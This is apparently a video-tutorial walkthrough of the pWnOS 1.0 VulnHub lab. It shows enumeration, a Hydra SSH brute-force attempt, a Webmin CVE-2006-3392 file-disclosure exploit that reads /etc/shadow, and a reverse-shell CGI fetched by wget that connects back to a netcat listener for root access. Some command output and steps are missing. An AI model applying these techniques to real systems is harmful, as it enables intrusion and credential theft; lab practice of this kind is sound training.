Hello everyone! Welcome to my new video.
Today, we're exploring a vulnerable machine called "pWnOS 1.0." This
machine is part of the pWnOS series and is classified as an easy-level
vulnerable VM, perfect for beginners.
It’s designed for those passionate about
learning how system and application vulnerabilities can lead to system
compromise.
To get started, head over to the VulnHub
website and download the pWnOS 1.0 image.
If you're new to VulnHub, be sure to
check out our VulnHub playlist for helpful videos that will guide you through
the process.
Vulhub provides a collection of pre-built vulnerable docker environments, designed for learning and practicing security vulnerability assessments and penetration testing. Explore various scenarios and improve your cybersecurity skills.
Let's dive in and start our exploration!
Settings Up
Once we've downloaded the image, the next
step is setting up the server in Virtual Machine.
The downloaded image is in the form of a
zip file, but, as mentioned in the README on the download page, pWnOS is made
using VMware Workstation.
Although I've tried to install it on
VirtualBox, it will not automatically allocate an IP address. Therefore, it is
important to use VMware.
However, a problem arises if we use VMware since we have set up our attacking machine on VirtualBox.
Do we have to
reinstall it on VMware? Here, I have a solution. Follow my steps to get to
know.
Before we start the process, make sure you
already have VMware installed. If not, visit this blog and follow the steps to
install it without any cost.
This comprehensive guide covers the installation process of VMware. Learn how to set up VMware effectively for your virtualization needs, enhancing your system's capabilities and performance.
Since we have the zip file, we can now
extract it using WinRAR.
After extraction, you will see, that we have various files
that look like the previously used files of pWnOS 1.0 on VMware.
To add the virtual machine to the VMware
Workstation, double-click on the VMware virtual machine file type among the
several files. It will automatically launch VMware Workstation and run it.
When VMware asks whether you copied or
moved this virtual machine on the first boot, click on "I MOVED it!"
Otherwise, the network settings could get messed up.
There are various settings left, so we have
to power off the machine and launch VMware again. As you can see, the
"pWnOS" vulnerable machine is listed in the VMware Manager.
As I previously mentioned, there is no need
to reinstall the attacking machine (Kali Linux) on VMware to access the
network. Instead, we can change the network settings to use the VirtualBox
host-only adapter.
To do this, click on “Edit virtual machine
settings.”
In the settings window, click on “Network Adapter.”
Check the box that says “Replicate physical network connection state.”
This ensures that the network connection state of your host machine is replicated in the virtual machine.
Now, click on the “Configure Adapters” button under the "Bridged" option.
In the adapter settings, select only the
“VirtualBox Host-Only Ethernet Adapter” and unmark any other adapters.
This
setting will bridge the VMware virtual machine’s network connection through the
VirtualBox host-only adapter. Click OK to save the settings and close the
configuration window.
By following these steps, you ensure that
both your Kali Linux machine (in VirtualBox) and the pwnOS machine (in VMware)
are connected to the same host-only network, enabling them to communicate with
each other.
Now, you can start your pwnOS virtual
machine and begin your penetration testing tasks!
Finally, you'll notice that our Vulnerable
Machine is ready, with a login prompt awaiting.
Let's dive into the
fun!
Enumeration
Identifying the IP address
The initial step in our attack is
enumeration, which involves identifying the IP address of our target machine
using NetDiscover. To execute this, open a terminal and run "netdiscover
-i" followed by specifying the network interface name, which in this
case is "eth1."
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.99.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
From the scan results, we've obtained our target
IP address: "192.168.95.25."
Conduct a network scan to identify open ports
Next, we'll conduct a network scan to
identify open ports, a crucial step in the enumeration process. This helps us
understand the attack surface and strategize targeted attacks. We'll use the
popular Nmap tool for this task. Run:
nmap -sC -sV {Target IP address}
In this command,
"-sC" is used to perform a script scan using the default set
of scripts,
while "-sV" enables version detection, allowing us
to identify which versions are running on which port.
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 19:50 IST
Nmap scan report for 192.168.95.25
Host is up (0.0030s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.22 seconds
┌──(kali㉿kali)-[~]
└─$
After completing the network scan, we
identified five open ports:
Port 22/TCP: This is the standard port for
Secure Shell (SSH), a secure remote login protocol. It allows secure access to
the machine's command line for remote administration.
Port 80/TCP: This is the default port for
HTTP, the protocol used for web communication. It enables access to web
services running on the machine, potentially revealing website content or
applications.
Port 139 and 445/TCP: These ports are
commonly used by Samba, a file-sharing protocol for Windows networks. They
facilitate file sharing between Windows machines and the target device.
Unauthorized access could expose sensitive data.
Port 10000/TCP: This is a less common port
used by MiniServ, a lightweight web server. If a web server is running on this
port, it might provide access to additional services or information.
With this information, we can proceed to
explore these services for potential vulnerabilities and exploit them to gain
access to the target system. Let's use these ports to further enumerate, which
may lead us to gain a foothold on the target system.
Web Enumeration
Now, let's explore the content of the
website running on Port 80. To do this, open a web browser of your choice and
navigate to the target’s IP address in the URL bar at the top of the window.
Upon inspection, you’ll find a welcome
homepage for pWnOS. At the bottom of the page, there is a "Next"
button that leads to a help page.
Clicking on "Next" takes us to a
help page, which contains a form. The form includes an input field for a name
and a "Skillz" section with three options to select from: noob,
skilled noob, and leet hackxor.
Let's take a closer look.
Upon entering a
name and selecting an option, the page displays a funny message, mocking the
choice made for any of the three options.
To investigate further, let's check the
page source for any clues.
However, there doesn't appear to be anything useful
there.
Since we haven't found anything significant, let's move on and enumerate
other available ports to continue our investigation.
Enumerating Samba, a file-sharing Protocol
Among the open ports, Ports 139 and 445/TCP
are used by Samba, a file-sharing protocol for Windows networks. These ports
facilitate file sharing between Windows machines and the target device. In some
cases, developers might accidentally leave a share unprotected, allowing
unauthorized access.
To check for available shares, use the
smbclient tool in the terminal. Run the following command: smbclient -L
<target_IP>.
When prompted for a password, just press Enter to continue without providing a password. This will display various shared resources.
┌──(kali㉿kali)-[~]
└─$ smbclient -L 192.168.95.25
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
home Disk Home Directory for vmware User
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntuvm)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
MSHOME UBUNTUVM
┌──(kali㉿kali)-[~]
└─$
I noticed a "home" share that looks interesting and
might contain useful files. Next, we will attempt to connect to the
"home" resource on the target server to retrieve the files and
directories.
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.95.25/home
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.95.25/print$
Password for [WORKGROUP\kali]:
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.95.25/IPC$
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
smb: \>
Unfortunately, the connection failed due to an access denied
error. The same issue occurred with other shares, indicating that they are
restricted.
Enumerate the username and password by Brute forcing
Additionally, I tried enumerating usernames
and attempted a brute-force attack against these usernames.
┌──(kali㉿kali)-[~]
└─$ enum4linux -U 192.168.95.25 | tee usernames_out.txt
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun May 26 20:33:25 2024
=========================================( Target Information )=========================================
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-26 20:57:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 344265576 login tries (l:24/p:14344399), ~21516599 tries per task
[DATA] attacking ssh://192.168.95.25:22/
[ERROR] could not connect to ssh://192.168.95.25:22 - kex error : no match for method server host key algo: server [ssh-rsa,ssh-dss], client [ssh-ed25519,ecdsa-sha2-nistp521,ecdsa-sha2-nistp384,ecdsa-sha2-nistp256,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256]
┌──(kali㉿kali)-[~]
└─$
However, this
approach was unsuccessful as the system is highly secure and does not permit
brute-force attacks.
There is only one port left for us to
explore.
Enumerating the MiniServ WebMin Httpd server
Port 10000 is used by MiniServ, a
lightweight web server.
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Since it is running a web server, it might provide
access to additional services or information. On the web browser, Add the port number after
the target's IP address in your web browser's URL bar, followed by a colon.
Upon accessing the web server, you will be
prompted to enter a username and password to log in to Webmin.
Webmin is a
free, open-source, web-based control panel for managing Unix-like systems. It
allows users to configure operating system internals and control open-source
applications through a web browser interface.
The Webmin login panel appears to be an old
or outdated version, which could be a security risk. To check for
vulnerabilities, we can use Nmap's scripting engine.
Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds
┌──(kali㉿kali)-[~]
└─$
Running a Nmap scan with the http-vuln-*
script reveals a potential vulnerability (CVE-2006-3392) in Webmin on port
10000. This vulnerability allows unauthorized file disclosure on the target
machine.
Since we've identified a potential
vulnerability, we should proceed to exploit it to gain a foothold on the target
server.
Exploiting (CVE-2006-3392)
To download the exploit file, click on the
provided Exploit-DB link. This will redirect you to the page where you can
download the exploit.
Find detailed information on exploit 1997 on Exploit Database. This resource provides comprehensive details about the vulnerability, including exploitation techniques and potential mitigations.
Once downloaded, it is important to check
if there is any modification required.
Next, we need to run the exploit and check
its options. To do this, use PHP to execute the exploit
file. Open a terminal and run it using php followed by the exploit file.
┌──(kali㉿kali)-[~/Downloads]
└─$ php 1997.php
PHP Warning: Undefined array key 1 in /home/kali/Downloads/1997.php on line 10
PHP Warning: Undefined array key 2 in /home/kali/Downloads/1997.php on line 11
PHP Warning: Undefined array key 3 in /home/kali/Downloads/1997.php on line 12
PHP Warning: Undefined array key 4 in /home/kali/Downloads/1997.php on line 13
Usage php webmin.php HOST PORT HTTP/HTTPS FILE
Example : php webmin.php localhost 10000 http /etc/shadow
Coded by joffer , http://securitydot.net
# milw0rm.com [2006-07-09]
┌──(kali㉿kali)-[~/Downloads]
└─$
The exploit will guide us to provide
several pieces of information.
php webmin.php {Target IP address} {Target Port} {http or https} {Specify the File path}
First, we have to Enter the target machine's IP
address.
Next, we have to specify the port number, in our case, 10000.
Next, we
have to specify the connection type, if it is, HTTP or HTTPS.
In the end, we
have to mention the path of the file, which we want to access. Here, I am
looking for /etc/shadow/.
Upon execution, if you encounter a fatal
error related to the curl_init() function, it
indicates that the php-curl extension is not
installed on our Kali Linux system. To fix this issue, install php-curl.
┌──(kali㉿kali)-[~/Downloads]
└─$ sudo apt install php-curl
After installing the required extension,
try running the exploit again. If everything is set up correctly, the exploit
should work as expected.
Accessing each user's directory, revealed
no flags.
Privilege Escalation Using File Disclosure Vulnerability
During privilege escalation, the initial
step involves gathering system information to pinpoint potential
vulnerabilities or misconfigurations that could grant higher access privileges,
ultimately leading to root access.
To begin, we need to examine the
permissions assigned to users to assess their privileges on the system. This
can be achieved by executing commands like "sudo -l" to view
the commands the current user can run with elevated privileges.
vmware@ubuntuvm:/home/yomama$ sudo -l
[sudo] password for vmware:
Sorry, user vmware may not run sudo on ubuntuvm.
vmware@ubuntuvm:/home/yomama$
In this case, it appears that the user
"vmware" does not have permission to use sudo. Let's gather more details by checking the
kernel version using the "uname -a" command.
vmware@ubuntuvm:/home/yomama$ uname -a
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 1686 GNU/Linux
vmware@ubuntuvm:/home/yomama$
This command provides information about the
kernel version, which can be useful for identifying known vulnerabilities.
Although this system is vulnerable to local
privilege escalation exploits, we will not be using them for this particular
exercise. Instead, we'll focus on another method.
If you look closely, when we previously
extracted the target machine’s shadow file using the file disclosure
vulnerability, it worked immediately. However, on the established SSH session,
trying to view the shadow file results in a permission-denied error.
This
indicates that the file disclosure vulnerability allows actions with root
permissions.
It means that if we can execute a reverse shell
script by taking advantage of this vulnerability, potentially giving us root
access.
Craft and deploy a reverse shell CGI script
Here's how we can craft and deploy a reverse shell CGI script.
Why Craft and Use a CGI
Script?
CGI scripts can be executed by web
servers, and placing a reverse shell in such a script allows us to run
arbitrary commands on the target system remotely. By downloading and executing
the script via the file disclosure vulnerability, we will be able to exploit the
system’s ability to run external scripts.
First, we have to locate the Perl reverse
shell script. Once we have located the Perl reverse shell
script, Copy the Perl reverse shell script and rename it to pshell.cgi.
Now, we have to edit the Script. Open
pshell.cgi in a text editor. Update the script to use your Kali Linux host-only
IP address.
This IP address will be where the reverse shell will connect back
to. Check and, if necessary, modify the
listening port to match the port you will use for the Netcat listener. Save the
edited script with the new settings.
This ensures that the reverse shell script
will connect back to your Kali Linux system on the correct IP address and port
when executed.
Now, we have to send this file to the target
system, so we need to start a simple HTTP server using Python. This server listens
on port 8000 and allows clients to download files from it.
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Now, on the target system shell, which we
previously established using SSH, we will use w get to download the pshell.cgi
script from the HTTP server. Before that, change the directory to /tmp. Now,
run wget to download the script.
This command fetches the file from the Python
HTTP server and saves it to the /tmp directory.
Now, it is important to check, if pshell.cgi has the correct permissions to be executable. If not, we have to
set the correct permissions to make the script executable.
Before running the exploit, start a Netcat
listener on your Kali Linux system to receive the reverse shell connection.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
This command sets up a listener on port 1234 for incoming connections from the
reverse shell script.
Now, use the PHP file disclosure
vulnerability to execute the pshell.cgi script on the target
system. This will trigger the reverse shell and connect back to your Netcat
listener.
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0 gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# id
uid=0 gid=0(root)
# which python
/usr/bin/python
# python -c "import pty;pty.spawn('/bin/bash')"
I have no name!@ubuntuvm:/#
With a root shell established, inspect the
system for flags.
In this exercise, no flags were found, so we conclude today's
tutorial. If you have any doubts or questions, feel free to ask in the comments
section. See you in pWnOS 2!